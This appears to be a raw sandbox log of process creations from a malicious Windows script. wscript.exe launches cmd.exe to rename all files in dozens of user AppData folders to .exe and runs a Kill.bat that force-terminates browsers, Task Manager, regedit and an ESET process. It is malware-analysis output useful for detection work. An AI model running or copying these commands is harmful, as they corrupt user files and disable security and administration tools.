    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im msedge.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im microsoftedge.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im notepad.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im mspaint.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im skype.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im bing.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im eset.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im edge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im msedge.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im microsoftedge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im notepad.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im mspaint.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im skype.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im bing.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im eset.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im edge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
